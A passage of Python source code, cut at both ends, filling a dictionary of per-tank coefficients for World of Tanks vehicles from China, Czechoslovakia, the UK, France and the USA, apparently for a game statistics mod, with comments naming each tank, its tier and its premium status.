china_Ch06_Renault_NC31 lvl:1 coeff:1.419 '817276902' : 6762326160, # 2353 china_Ch07_Vickers_MkE_Type_BT26 lvl:2 coeff:1.128 '1528616934' : 6039332778, # 4401 china_Ch08_Type97_Chi_Ha lvl:3 coeff:1.0074 '1084029414' : 6196400992, # 3121 china_Ch09_M5 lvl:4 coeff:1.0336 '1706451942' : 5545347250, # 4913 china_Ch15_59_16 lvl:6 coeff:0.925 '22513147878': 8093209500, # 64817 china_Ch24_Type64 lvl:6 coeff:1.35 !!!!PREMIUM '1172946918' : 4676076600, # 3377 china_Ch16_WZ_131 lvl:7 coeff:0.78 '105936870' : 8392958000, # 305 china_Ch02_Type62 lvl:7 coeff:1.4 !!!!PREMIUM '1350781926' : 4043607265, # 3889 china_Ch17_WZ131_1_WZ132 lvl:8 coeff:0.6745 '21535055334': 8992455000, # 62001 china_Ch42_WalkerBulldog_M41D lvl:8 coeff:1.5 !!!!PREMIUM '1973204454' : 4016629900, # 5681 china_Ch28_WZ_132A lvl:9 coeff:0.67 '2062121958' : 3956680200, # 5937 china_Ch29_Type_62C_prot lvl:10 coeff:0.66 # mediumTank '1617534438' : 6654416700, # 4657 china_Ch21_T34 lvl:5 coeff:1.11 '1795369446' : 5449427730, # 5169 china_Ch20_Type58 lvl:6 coeff:0.909 '372689382' : 4676076600, # 1073 china_Ch04_T34_1 lvl:7 coeff:0.78 '22246395366': 9442077750, # 64049 china_Ch14_T34_3 lvl:8 coeff:1.575 !!!!PREMIUM '17019366' : 9442077750, # 49 china_Ch01_Type59 lvl:8 coeff:1.575 !!!!PREMIUM '194854374' : 9442077750, # 561 china_Ch01_Type59_Gold lvl:8 coeff:1.575 !!!!PREMIUM '22157477862': 8992455000, # 63793 china_Ch26_59_Patton lvl:8 coeff:1.5 !!!!PREMIUM '550524390' : 4244438760, # 1585 china_Ch05_T34_2 lvl:8 coeff:0.708 '639441894' : 4256428700, # 1841 china_Ch18_WZ-120 lvl:9 coeff:0.71 '22068560358': 4376328100, # 63537 china_Ch25_121_mod_1971B lvl:10 coeff:0.73 !!!!PREMIUM '1439699430' : 4376328100, # 4145 china_Ch19_121 lvl:10 coeff:0.73 # heavyTank '1261864422' : 5239603780, # 3633 china_Ch10_IS2 lvl:7 coeff:0.874 '22602065382': 9442077750, # 65073 china_Ch03_WZ_111_A lvl:8 coeff:1.575 !!!!PREMIUM '995111910' : 4688066540, # 2865 china_Ch11_110 lvl:8 coeff:0.782 '283771878' : 9442077750, # 817 china_Ch03_WZ-111 lvl:8 coeff:1.575 !!!!PREMIUM '22424230374': 9292203500, # 64561 china_Ch23_112 lvl:8 coeff:1.55 !!!!PREMIUM '728359398' : 4196479000, # 2097 china_Ch12_111_1_2_3 lvl:9 coeff:0.7 '1884286950' : 4640106780, # 5425 china_Ch22_113 lvl:10 coeff:0.774 '2151039462' : 4616126900, # 6193 china_Ch41_WZ_111_5A lvl:10 coeff:0.77 # AT-SPG '2239956966' : 6294718500, # 6449 china_Ch30_T-26G_FT lvl:2 coeff:1.05 '2328874470' : 5695221500, # 6705 china_Ch31_M3G_FT lvl:3 coeff:0.95 '2417791974' : 5395473000, # 6961 china_Ch32_SU-76G_FT lvl:4 coeff:0.9 '2506709478' : 5695221500, # 7217 china_Ch33_60G_FT lvl:5 coeff:0.95 '2595626982' : 5395473000, # 7473 china_Ch34_WZ131G_FT lvl:6 coeff:0.9 '2684544486' : 4795976000, # 7729 china_Ch35_T-34-2G_FT lvl:7 coeff:0.8 '2773461990' : 4316378400, # 7985 china_Ch36_WZ111_1G_FT lvl:8 coeff:0.72 '21979642854': 8992455000, # 63281 china_Ch39_WZ120_1G_FT lvl:8 coeff:1.5 !!!!PREMIUM '2862379494' : 4196479000, # 8241 china_Ch37_WZ111G_FT lvl:9 coeff:0.7 '2951296998' : 3716881400, # 8497 china_Ch38_WZ113G_FT lvl:10 coeff:0.62 # heavyTank # '21801807846': None, #62769 china_Ch22_113P lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62769 #только КИТАЙ # '21712890342': None, #62513 china_Ch22_113_Beijing_Opera lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62513 #только КИТАЙ # '21623972838': None, #62257 china_Ch41_WZ_111_QL lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62257 #только КИТАЙ # AT-SPG # '21890725350': None, #63025 china_Ch40_WZ120G_FT lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=63025 #только КИТАЙ }) self.p__COEFFICIENTS.update({ # czech # lightTank '39248742' : 8392958000, # 113 czech_Cz06_Kolohousenka lvl:1 coeff:1.4 '128166246' : 6594467000, # 369 czech_Cz03_LT_vz35 lvl:2 coeff:1.1 '217083750' : 6294718500, # 625 czech_Cz10_LT_vz38 lvl:3 coeff:1.05 # mediumTank '306001254' : 5994970000, # 881 czech_Cz11_V_8_H lvl:4 coeff:1.0 '394918758' : 5994970000, # 1137 czech_Cz09_T_24 lvl:5 coeff:1.0 '17911667046': 7793461000, # 51569 czech_Cz01_Skoda_T40 lvl:6 coeff:1.3 !!!!PREMIUM '483836262' : 5395473000, # 1393 czech_Cz08_T_25 lvl:6 coeff:0.9 '572753766' : 4616126900, # 1649 czech_Cz05_T34_100 lvl:7 coeff:0.77 '18000584550': 8992455000, # 51825 czech_Cz13_T_27 lvl:8 coeff:1.5 !!!!PREMIUM '661671270' : 4316378400, # 1905 czech_Cz07_TVP_46 lvl:8 coeff:0.72 '750588774' : 4256428700, # 2161 czech_Cz02_TVP_T50 lvl:9 coeff:0.71 '839506278' : 4376328100, # 2417 czech_Cz04_T50_51 lvl:10 coeff:0.73 }) self.p__COEFFICIENTS.update({ # uk # lightTank '1806484134' : 7187969030, # 5201 uk_GB03_Cruiser_Mk_I lvl:2 coeff:1.199 '205969062' : 6594467000, # 593 uk_GB14_M2 lvl:2 coeff:1.1 '19056479910': 7791063012, # 54865 uk_GB76_Mk_VIC lvl:2 coeff:1.2996 !!!!PREMIUM '2695659174' : 6534517300, # 7761 uk_GB58_Cruiser_Mk_III lvl:2 coeff:1.09 '2606741670' : 6528522330, # 7505 uk_GB59_Cruiser_Mk_IV lvl:3 coeff:1.089 '2428906662' : 6528522330, # 6993 uk_GB69_Cruiser_Mk_II lvl:3 coeff:1.089 '472721574' : 5994970000, # 1361 uk_GB15_Stuart_I lvl:3 coeff:1.0 '2251071654' : 6456582690, # 6481 uk_GB60_Covenanter lvl:4 coeff:1.077 '1717566630' : 6150839220, # 4945 uk_GB04_Valentine lvl:4 coeff:1.026 '20745912486': 4675477103, # 59729 uk_GB104_GSR_3301_Setter lvl:7 coeff:0.7799 '20656994982': 4076579600, # 59473 uk_GB102_LHMTV lvl:8 coeff:0.68 '20301324966': 8992455000, # 58449 uk_GB101_FV1066_Senlac lvl:8 coeff:1.5 !!!!PREMIUM '20390242470': 4017229397, # 58705 uk_GB103_GSOR3301_AVR_FS lvl:9 coeff:0.6701 '20479159974': 3956680200, # 58961 uk_GB100_Manticore lvl:10 coeff:0.66 # mediumTank '28134054' : 9813765890, # 81 uk_GB01_Medium_Mark_I lvl:1 coeff:1.637 '117051558' : 7511697410, # 337 uk_GB05_Vickers_Medium_Mk_II lvl:2 coeff:1.253 '828391590' : 6528522330, # 2385 uk_GB06_Vickers_Medium_Mk_III lvl:3 coeff:1.089 '294886566' : 6150839220, # 849 uk_GB07_Matilda lvl:4 coeff:1.026 '18345139878': 7553662200, # 52817 uk_GB33_Sentinel_AC_I lvl:4 coeff:1.26 !!!!PREMIUM '561639078' : 5994970000, # 1617 uk_GB17_Grant_I lvl:4 coeff:1.0 '739474086' : 6336683290, # 2129 uk_GB20_Crusader lvl:5 coeff:1.057 '18611892390': 9172304100, # 53585 uk_GB68_Matilda_Black_Prince lvl:5 coeff:1.53 !!!!PREMIUM '4474009254' : 5994970000, # 12881 uk_GB50_Sherman_III lvl:5 coeff:1.0 '19501067430': 7313863400, # 56145 uk_GB35_Sentinel_AC_IV lvl:6 coeff:1.22 !!!!PREMIUM '383804070' : 5587312040, # 1105 uk_GB21_Cromwell lvl:6 coeff:0.932 '19856737446': 7793461000, # 57169 uk_GB95_Ekins_Firefly_M4A4 lvl:6 coeff:1.3 !!!!PREMIUM '19412149926': 7493712500, # 55889 uk_GB85_Cromwell_Berlin lvl:6 coeff:1.25 !!!!PREMIUM '1272979110' : 5095724500, # 3665 uk_GB19_Sherman_Firefly lvl:6 coeff:0.85 '1895401638' : 4616126900, # 5457 uk_GB22_Comet lvl:7 coeff:0.77 '19767819942': 8992455000, # 56913 uk_GB94_Centurion_Mk5-1_RAAC lvl:8 coeff:1.5 !!!!PREMIUM '5363184294' : 9292203500, # 15441 uk_GB87_Chieftain_T95_turret lvl:8 coeff:1.55 !!!!PREMIUM '2073236646' : 4945850250, # 5969 uk_GB23_Centurion lvl:8 coeff:0.825 '19323232422': 9591952000, # 55633 uk_GB70_N_FV4202_105 lvl:8 coeff:1.6 !!!!PREMIUM '1984319142' : 4376328100, # 5713 uk_GB24_Centurion_Mk3 lvl:9 coeff:0.73 '2517824166' : 4376328100, # 7249 uk_GB86_Centurion_Action_X lvl:10 coeff:0.73 '5185349286' : 4376328100, # 14929 uk_GB70_FV4202_105 lvl:10 coeff:0.73 # heavyTank '18878644902': 8392958000, # 54353 uk_GB51_Excelsior lvl:5 coeff:1.4 !!!!PREMIUM '1006226598' : 6684391550, # 2897 uk_GB08_Churchill_I lvl:5 coeff:1.115 '18700809894': 8273058600, # 53841 uk_GB63_TOG_II lvl:6 coeff:1.38 !!!!PREMIUM '1628649126' : 5875070600, # 4689 uk_GB09_Churchill_VII lvl:6 coeff:0.98 '1095144102' : 5011794920, # 3153 uk_GB10_Black_Prince lvl:7 coeff:0.836 '19145397414': 7793461000, # 55121 uk_GB52_A45 lvl:7 coeff:1.3 !!!!PREMIUM '19678902438': 8992455000, # 56657 uk_GB93_Caernarvon_AX lvl:8 coeff:1.5 !!!!PREMIUM '1361896614' : 4945850250, # 3921 uk_GB11_Caernarvon lvl:8 coeff:0.825 '1539731622' : 4508217440, # 4433 uk_GB12_Conqueror lvl:9 coeff:0.752 '5452101798' : 4466252650, # 15697 uk_GB91_Super_Conqueror lvl:10 coeff:0.745 '2162154150' : 4466252650, # 6225 uk_GB13_FV215b lvl:10 coeff:0.745 !!!!PREMIUM '20123489958': 4376328100, # 57937 uk_GB98_T95_FV4201_Chieftain lvl:10 coeff:0.73 !!!!PREMIUM '5274266790' : 4376328100, # 15185 uk_GB84_Chieftain_Mk6 lvl:10 coeff:0.73 !!!!PREMIUM # AT-SPG '2873494182' : 6594467000, # 8273 uk_GB39_Universal_CarrierQF2 lvl:2 coeff:1.1 '2784576678' : 5395473000, # 8017 uk_GB42_Valentine_AT lvl:3 coeff:0.9 '3140246694' : 5665246650, # 9041 uk_GB57_Alecto lvl:4 coeff:0.945 '4651844262' : 5695221500, # 13393 uk_GB44_Archer lvl:5 coeff:0.95 '3051329190' : 5976985090, # 8785 uk_GB73_AT2 lvl:5 coeff:0.997 '3318081702' : 5395473000, # 9553 uk_GB74_AT8 lvl:6 coeff:0.9 '20034572454': 8572807100, # 57681 uk_GB96_Excalibur lvl:6 coeff:1.43 !!!!PREMIUM '5007514278' : 5395473000, # 14417 uk_GB45_Achilles_IIC lvl:6 coeff:0.9 '3406999206' : 6066909640, # 9809 uk_GB40_Gun_Carrier_Churchill lvl:6 coeff:1.012 '18789727398': 8273058600, # 54097 uk_GB71_AT_15A lvl:7 coeff:1.38 !!!!PREMIUM '3495916710' : 4766001150, # 10065 uk_GB75_AT7 lvl:7 coeff:0.795 '4918596774' : 4496227500, # 14161 uk_GB41_Challenger lvl:7 coeff:0.75 '20834829990': 8992455000, # 59985 uk_GB99_Turtle_Mk1 lvl:8 coeff:1.5 !!!!PREMIUM '2962411686' : 4340358280, # 8529 uk_GB72_AT15 lvl:8 coeff:0.724 '5096431782' : 4256428700, # 14673 uk_GB80_Charioteer lvl:8 coeff:0.71 '4562926758' : 3896730500, # 13137 uk_GB81_FV4004 lvl:9 coeff:0.65 '18256222374': 4286403550, # 52561 uk_GB32_Tortoise lvl:9 coeff:0.715 '3229164198' : 3495067510, # 9297 uk_GB48_FV215b_183 lvl:10 coeff:0.583 !!!!PREMIUM '4829679270' : 3596982000, # 13905 uk_GB83_FV4005 lvl:10 coeff:0.6 '5541019302' : 3495067510, # 15953 uk_GB92_FV217 lvl:10 coeff:0.583 # SPG '3673751718' : 6894215500, # 10577 uk_GB25_Loyd_Gun_Carriage lvl:2 coeff:1.15 '18967562406': 10850895700, # 54609 uk_GB78_Sexton_I lvl:3 coeff:1.81 !!!!PREMIUM '1184061606' : 6534517300, # 3409 uk_GB27_Sexton lvl:3 coeff:1.09 '3762669222' : 6294718500, # 10833 uk_GB26_Birch_Gun lvl:4 coeff:1.05 '3851586726' : 6594467000, # 11089 uk_GB28_Bishop lvl:5 coeff:1.1 '4118339238' : 5994970000, # 11857 uk_GB77_FV304 lvl:6 coeff:1.0 '3940504230' : 4795976000, # 11345 uk_GB29_Crusader_5inch lvl:7 coeff:0.8 '4207256742' : 4496227500, # 12113 uk_GB79_FV206 lvl:8 coeff:0.75 '4029421734' : 4496227500, # 11601 uk_GB30_FV3805 lvl:9 coeff:0.75 '4296174246' : 4616126900, # 12369 uk_GB31_Conqueror_Gun lvl:10 coeff:0.77 # heavyTank # '20568077478': None, #59217 uk_GB105_Black_Prince_2019 lvl:6 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=59217 #A43 BP prototype, Этого танка нет ни у кого # '19589984934': None, #56401 uk_GB88_T95_Chieftain_turret lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=56401 #T95/Chieftain, Этого танка нет ни у кого }) self.p__COEFFICIENTS.update({ # france # lightTank '200411718' : 9771801100, # 577 france_F01_RenaultFT lvl:1 coeff:1.63 '15049634886': 7193964000, # 43329 france_F111_AM39_Gendron_Somua lvl:2 coeff:1.2 !!!!PREMIUM '5268709446' : 6594467000, # 15169 france_F50_FCM36_20t lvl:2 coeff:1.1 '556081734' : 7649581720, # 1601 france_F02_D1 lvl:2 coeff:1.276 '5535461958' : 6594467000, # 15937 france_F49_RenaultR35 lvl:2 coeff:1.1 '467164230' : 7307868430, # 1345 france_F12_Hotchkiss_H35 lvl:2 coeff:1.219 '15227469894': 6534517300, # 43841 france_F42_AMR_35 lvl:2 coeff:1.09 !!!!PREMIUM '2067679302' : 6672401610, # 5953 france_F13_AMX38 lvl:3 coeff:1.113 '1000669254' : 6270738620, # 2881 france_F14_AMX40 lvl:4 coeff:1.046 '4913039430' : 5994970000, # 14145 france_F62_ELC_AMX lvl:5 coeff:1.0 '6246801990' : 5215623900, # 17985 france_F109_AMD_Panhard_178B lvl:6 coeff:0.87 '2245514310' : 5233608810, # 6465 france_F15_AMX_12t lvl:6 coeff:0.873 '1800926790' : 4939855280, # 5185 france_F16_AMX_13_75 lvl:7 coeff:0.824 '6335719494' : 4675477103, # 18241 france_F107_Hotchkiss_EBR lvl:7 coeff:0.7799 '21985200198': 8391759006, # 63297 france_F69_AMX13_57_100_GrandFinal lvl:7 coeff:1.3998 !!!!PREMIUM '22163035206': 8392958000, # 63809 france_F69_AMX13_57_100 lvl:7 coeff:1.4 !!!!PREMIUM '15138552390': 8992455000, # 43585 france_F106_Panhard_EBR_75_Mle1954 lvl:8 coeff:1.5 !!!!PREMIUM '6068966982' : 4076579600, # 17473 france_F87_Batignolles-Chatillon_12t lvl:8 coeff:0.68 '6424636998' : 4076579600, # 18497 france_F110_Lynx_6x6 lvl:8 coeff:0.68 '21362777670': 8992455000, # 61505 france_F97_ELC_EVEN_90 lvl:8 coeff:1.5 !!!!PREMIUM '1712009286' : 4016629900, # 4929 france_F17_AMX_13_90 lvl:9 coeff:0.67 '6513554502' : 4017229397, # 18753 france_F100_Panhard_EBR_90 lvl:9 coeff:0.6701 '5980049478' : 3956680200, # 17217 france_F88_AMX_13_105 lvl:10 coeff:0.66 '6602472006' : 3956680200, # 19009 france_F108_Panhard_EBR_105 lvl:10 coeff:0.66 # mediumTank '4557369414' : 5994970000, # 13121 france_F44_Somua_S35 lvl:3 coeff:1.0 '111494214' : 6144844250, # 321 france_F03_D2 lvl:3 coeff:1.025 '5179791942' : 5994970000, # 14913 france_F70_SARL42 lvl:4 coeff:1.0 '1534174278' : 6294718500, # 4417 france_F11_Renault_G1R lvl:5 coeff:1.05 '21096025158': 7493712500, # 60737 france_F113_Bretagne_Panther lvl:6 coeff:1.25 !!!!PREMIUM '22074117702': 8992455000, # 63553 france_F68_AMX_Chasseur_de_char_46 lvl:8 coeff:1.5 !!!!PREMIUM '21896282694': 8992455000, # 63041 france_F73_M4A1_Revalorise lvl:8 coeff:1.5 !!!!PREMIUM '21718447686': 9591952000, # 62529 france_F19_Lorraine40t lvl:8 coeff:1.6 !!!!PREMIUM '1978761798' : 4897890490, # 5697 france_F75_Char_de_25t lvl:9 coeff:0.817 '5446544454' : 4496227500, # 15681 france_F71_AMX_30_prototype lvl:9 coeff:0.75 '5357626950' : 4376328100, # 15425 france_F72_AMX_30 lvl:10 coeff:0.73 '1267421766' : 4496227500, # 3649 france_F18_Bat_Chatillon25t lvl:10 coeff:0.75 # heavyTank '378246726' : 6474567600, # 1089 france_F04_B1 lvl:4 coeff:1.08 '2334431814' : 6474567600, # 6721 france_F05_BDR_G1B lvl:5 coeff:1.08 '911751750' : 5431442820, # 2625 france_F06_ARL_44 lvl:6 coeff:0.906 '2423349318' : 4766001150, # 6977 france_F07_AMX_M4_1945 lvl:7 coeff:0.795 '21629530182': 8992455000, # 62273 france_F84_Somua_SM lvl:8 coeff:1.5 !!!!PREMIUM '5713296966' : 4795976000, # 16449 france_F81_Char_de_65t lvl:8 coeff:0.8 '21540612678': 9591952000, # 62017 france_F74_AMX_M4_1949_Liberte lvl:8 coeff:1.6 !!!!PREMIUM '22251952710': 8662731650, # 64065 france_F65_FCM_50t lvl:8 coeff:1.445 !!!!PREMIUM '1089586758' : 4754011210, # 3137 france_F08_AMX_50_100 lvl:8 coeff:0.793 '21807365190': 9591952000, # 62785 france_F74_AMX_M4_1949 lvl:8 coeff:1.6 !!!!PREMIUM '1356339270' : 4208468940, # 3905 france_F09_AMX_50_120 lvl:9 coeff:0.702 '5802214470' : 4316378400, # 16705 france_F83_AMX_M4_Mle1949_Bis lvl:9 coeff:0.72 '2156596806' : 4496227500, # 6209 france_F10_AMX_50B lvl:10 coeff:0.75 '5891131974' : 4256428700, # 16961 france_F82_AMX_M4_Mle1949_Ter lvl:10 coeff:0.71 # AT-SPG '2690101830' : 5935020300, # 7745 france_F30_RenaultFT_AC lvl:2 coeff:0.99 '2867936838' : 5503382460, # 8257 france_F52_RenaultUE57 lvl:3 coeff:0.918 '822834246' : 7793461000, # 2369 france_F27_FCM_36Pak40 lvl:3 coeff:1.3 !!!!PREMIUM '3401441862' : 5809125930, # 9793 france_F32_Somua_Sau_40 lvl:4 coeff:0.969 '21273860166': 8692706500, # 61249 france_F112_M10_RBFM lvl:5 coeff:1.45 !!!!PREMIUM '3490359366' : 5437437790, # 10049 france_F33_S_35CA lvl:5 coeff:0.907 '4023864390' : 5467412640, # 11585 france_F34_ARL_V39 lvl:6 coeff:0.912 '3757111878' : 4718041390, # 10817 france_F35_AMX_AC_Mle1946 lvl:7 coeff:0.787 '4201699398' : 4256428700, # 12097 france_F36_AMX_AC_Mle1948 lvl:8 coeff:0.71 '21451695174': 8992455000, # 61761 france_F89_Canon_dassaut_de_105 lvl:8 coeff:1.5 !!!!PREMIUM '3846029382' : 4196479000, # 11073 france_F37_AMX50_Foch lvl:9 coeff:0.7 '4824121926' : 3177334100, # 13889 france_F64_AMX_50Fosh_155 lvl:10 coeff:0.53 !!!!PREMIUM '6157884486' : 3176734603, # 17729 france_F64_AMX_50Fosh_B lvl:10 coeff:0.5299 # SPG '289329222' : 6894215500, # 833 france_F20_RenaultBS lvl:2 coeff:1.15 '1178504262' : 6474567600, # 3393 france_F21_Lorraine39_L_AM lvl:3 coeff:1.08 '5090874438' : 6510537420, # 14657 france_F66_AMX_Ob_Am105 lvl:4 coeff:1.086 '1445256774' : 6618446880, # 4161 france_F22_AMX_105AM lvl:5 coeff:1.104 '733916742' : 8093209500, # 2113 france_F28_105_leFH18B2 lvl:5 coeff:1.35 !!!!PREMIUM '1623091782' : 6726356340, # 4673 france_F23_AMX_13F3AM lvl:6 coeff:1.122 '2512266822' : 5395473000, # 7233 france_F24_Lorraine155_50 lvl:7 coeff:0.9 '2601184326' : 4256428700, # 7489 france_F25_Lorraine155_51 lvl:8 coeff:0.71 '5001956934' : 3836780800, # 14401 france_F67_Bat_Chatillon155_55 lvl:9 coeff:0.64 '4112781894' : 4676076600, # 11841 france_F38_Bat_Chatillon155_58 lvl:10 coeff:0.78 # mediumTank # '21184942662': None, #60993 france_F85_M4A1_FL10 lvl:6 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60993 #M4A1 FL 10, в разработке # '20918190150': None, #60225 france_F116_Bat_Chatillon_Bourrasque lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60225 #в разработке # '21007107654': None, #60481 france_F114_Projet_4_1 lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60481 #Char Futur 4, в разработке }) self.p__COEFFICIENTS.update({ # usa # lightTank '14238262662': 8992455000, # 40993 usa_A01_T1_Cunningham_bot lvl:1 coeff:1.5 '189297030' : 8183134050, # 545 usa_A01_T1_Cunningham lvl:1 coeff:1.365 '17883880326': 7613611900, # 51489 usa_A19_T2_lt lvl:2 coeff:1.27 !!!!PREMIUM '18595220358': 8692706500, # 53537 usa_A74_T1_E6 lvl:2 coeff:1.45 !!!!PREMIUM '14505015174': 8392958000, # 41761 usa_A22_M5_Stuart_bootcamp lvl:2 coeff:1.4 '19128725382': 7793461000, # 55073 usa_A93_T7_Combat_Car lvl:2 coeff:1.3 !!!!PREMIUM '14416097670': 8992455000, # 41505 usa_A03_M3_Stuart_bootcamp lvl:2 coeff:1.5 '633884550' : 6606456940, # 1825 usa_A02_M2_lt lvl:2 coeff:1.102 '100379526' : 6414617900, # 289 usa_A03_M3_Stuart lvl:3 coeff:1.07 '18061715334': 7553662200, # 52001 usa_A33_MTLS-1G14 lvl:3 coeff:1.26 !!!!PREMIUM '18328467846': 9412102900, # 52769 usa_A43_M22_Locust lvl:3 coeff:1.57 !!!!PREMIUM '1789812102' : 6474567600, # 5153 usa_A22_M5_Stuart lvl:4 coeff:1.08 '3390327174' : 5994970000, # 9761 usa_A34_M24_Chaffee lvl:5 coeff:1.0 '1878729606' : 6594467000, # 5409 usa_A23_M7_med lvl:5 coeff:1.1 '5791099782' : 5095724500, # 16673 usa_A94_T37 lvl:6 coeff:0.85 '5257594758' : 5275573600, # 15137 usa_A71_T21 lvl:6 coeff:0.88 '5435429766' : 4676076600, # 15649 usa_A103_T71E1 lvl:7 coeff:0.78 '6858109830' : 4676076600, # 19745 usa_A112_T71E2R lvl:7 coeff:0.78 '6235687302' : 4076579600, # 17953 usa_A97_M41_Bulldog lvl:8 coeff:0.68 '20106817926': 8992455000, # 57889 usa_A99_T92_LT lvl:8 coeff:1.5 !!!!PREMIUM '6324604806' : 4016629900, # 18209 usa_A100_T49 lvl:9 coeff:0.67 '6769192326' : 3956680200, # 19489 usa_A116_XM551 lvl:10 coeff:0.66 # mediumTank '1967647110' : 6756331190, # 5665 usa_A24_T2_med lvl:2 coeff:1.127 '14327180166': 8392958000, # 41249 usa_A24_T2_med_bot lvl:2 coeff:1.4 '1700894598' : 6258748680, # 4897 usa_A25_M2_med lvl:3 coeff:1.044 '1078472070' : 6648421730, # 3105 usa_A04_M3_Grant lvl:4 coeff:1.109 '18150632838': 9532002300, # 52257 usa_A44_M4A2E4 lvl:5 coeff:1.59 !!!!PREMIUM '4368419718' : 8392958000, # 12577 usa_A78_M4_Improved lvl:5 coeff:1.4 !!!!PREMIUM '367132038' : 5803130960, # 1057 usa_A05_M4_Sherman lvl:5 coeff:0.968 '17972797830': 9292203500, # 51745 usa_A62_Ram-II lvl:5 coeff:1.55 !!!!PREMIUM '20729240454': 7313863400, # 59681 usa_A118_M4_Thunderbolt lvl:6 coeff:1.22 !!!!PREMIUM '456049542' : 5203633960, # 1313 usa_A06_M4A3E8_Sherman lvl:6 coeff:0.868 '19484395398': 7313863400, # 56097 usa_A104_M4A3E8A lvl:6 coeff:1.22 !!!!PREMIUM '3479244678' : 5119704380, # 10017 usa_A36_Sherman_Jumbo lvl:6 coeff:0.854 '4101667206' : 7793461000, # 11809 usa_A86_T23E3 lvl:7 coeff:1.3 !!!!PREMIUM '20818157958': 7793461000, # 59937 usa_A121_M26_Cologne lvl:7 coeff:1.3 !!!!PREMIUM '544967046' : 4652096720, # 1569 usa_A07_T20 lvl:7 coeff:0.776 '811719558' : 9591952000, # 2337 usa_A08_T23 lvl:8 coeff:1.6 '19928982918': 8992455000, # 57377 usa_A111_T25_Pilot lvl:8 coeff:1.5 !!!!PREMIUM '5079759750' : 4016629900, # 14625 usa_A90_T69 lvl:8 coeff:0.67 '19840065414': 9442077750, # 57121 usa_A63_M46_Patton_KR lvl:8 coeff:1.575 !!!!PREMIUM '4635172230' : 9442077750, # 13345 usa_A80_T26_E4_SuperPershing lvl:8 coeff:1.575 !!!!PREMIUM '18684137862': 8992455000, # 53793 usa_A81_T95_E2 lvl:8 coeff:1.5 !!!!PREMIUM '2056564614' : 4244438760, # 5921 usa_A35_Pershing lvl:8 coeff:0.708 '21618415494': 8992455000, # 62241 usa_A127_TL_1_LPC lvl:8 coeff:1.5 !!!!PREMIUM '5346512262' : 4196479000, # 15393 usa_A89_T54E1 lvl:9 coeff:0.7 '3123574662' : 4502222470, # 8993 usa_A63_M46_Patton lvl:9 coeff:0.751 '5524347270' : 4376328100, # 15905 usa_A92_M60 lvl:10 coeff:0.73 !!!!PREMIUM '4901924742' : 4400307980, # 14113 usa_A120_M48A5 lvl:10 coeff:0.734 # heavyTank '1167389574' : 6558497180, # 3361 usa_A09_T1_hvy lvl:5 coeff:1.094 '11462022' : 9711851400, # 33 usa_A21_T14 lvl:5 coeff:1.62 !!!!PREMIUM '278214534' : 5587312040, # 801 usa_A10_M6 lvl:6 coeff:0.932 '1345224582' : 5011794920, # 3873 usa_A11_T29 lvl:7 coeff:0.836 '18239550342': 10011599900, # 52513 usa_A45_M6A2E1 lvl:8 coeff:1.67 !!!!PREMIUM '20373570438': 8992455000, # 58657 usa_A115_Chrysler_K_GF lvl:8 coeff:1.5 !!!!PREMIUM '1523059590' : 4963835160, # 4385 usa_A12_T32 lvl:8 coeff:0.828 '20551405446': 9442077750, # 59169 usa_A117_T26E5_Patriot lvl:8 coeff:1.575 !!!!PREMIUM '989554566' : 9442077750, # 2849 usa_A13_T34_hvy lvl:8 coeff:1.575 !!!!PREMIUM '20462487942': 9442077750, # 58913 usa_A117_T26E5 lvl:8 coeff:1.575 !!!!PREMIUM '3301409670' : 4406302950, # 9505 usa_A66_M103 lvl:9 coeff:0.735 '21440580486': 4675477103, # 61729 usa_A125_AEP_1 lvl:9 coeff:0.7799 !!!!PREMIUM '3745997190' : 4406302950, # 10785 usa_A69_T110E5 lvl:10 coeff:0.735 '5168677254' : 4376328100, # 14881 usa_A67_T57_58 lvl:10 coeff:0.73 '21529497990': 8992455000, # 61985 usa_A124_T54E2 lvl:8 coeff:1.5 !!!!PREMIUM https://premomer.org/tank.php?id=61985 #M54 Renegade # AT-SPG '2145482118' : 6294718500, # 6177 usa_A46_T3 lvl:2 coeff:1.05 '2234399622' : 5695221500, # 6433 usa_A109_T56_GMC lvl:3 coeff:0.95 '2678987142' : 5005799950, # 7713 usa_A29_T40 lvl:4 coeff:0.835 '3568162182' : 5389478030, # 10273 usa_A57_M8A1 lvl:4 coeff:0.899 '3657079686' : 5779151080, # 10529 usa_A58_T67 lvl:5 coeff:0.964 '2412234630' : 5851090720, # 6945 usa_A30_M10_Wolverine lvl:5 coeff:0.976 '4012749702' : 4783986060, # 11553 usa_A41_M18_Hellcat lvl:6 coeff:0.798 '2501152134' : 5161669170, # 7201 usa_A31_M36_Slagger lvl:6 coeff:0.861 '21262745478': 7792262006, # 61217 usa_A123_T78 lvl:6 coeff:1.2998 !!!!PREMIUM '19573312902': 8093209500, # 56353 usa_A101_M56 lvl:7 coeff:1.35 !!!!PREMIUM '19662230406': 8392958000, # 56609 usa_A102_T28_concept lvl:7 coeff:1.4 !!!!PREMIUM '3212492166' : 4897890490, # 9249 usa_A64_T25_AT lvl:7 coeff:0.817 '3834914694' : 4388318040, # 11041 usa_A72_T25_2 lvl:7 coeff:0.732 '21707332998': 4783386563, # 62497 usa_A130_Super_Hellcat lvl:7 coeff:0.7979 !!!!PREMIUM '20995992966': 8992455000, # 60449 usa_A122_TS-5 lvl:8 coeff:1.5 !!!!PREMIUM '2856822150' : 4340358280, # 8225 usa_A39_T28 lvl:8 coeff:0.724 '3923832198' : 4262423670, # 11297 usa_A68_T28_Prototype lvl:8 coeff:0.711 '3034657158' : 4136529300, # 8737 usa_A40_T95 lvl:9 coeff:0.69 '900637062' : 4322373370, # 2593 usa_A14_T30 lvl:9 coeff:0.721 '4813007238' : 3788821040, # 13857 usa_A85_T110E3 lvl:10 coeff:0.632 '4546254726' : 3746856250, # 13089 usa_A83_T110E4 lvl:10 coeff:0.625 # SPG '722802054' : 7193964000, # 2081 usa_A107_T1_HMC lvl:2 coeff:1.2 '1256307078' : 6594467000, # 3617 usa_A16_M7_Priest lvl:3 coeff:1.1 '6413522310' : 6594467000, # 18465 usa_A108_T18_HMC 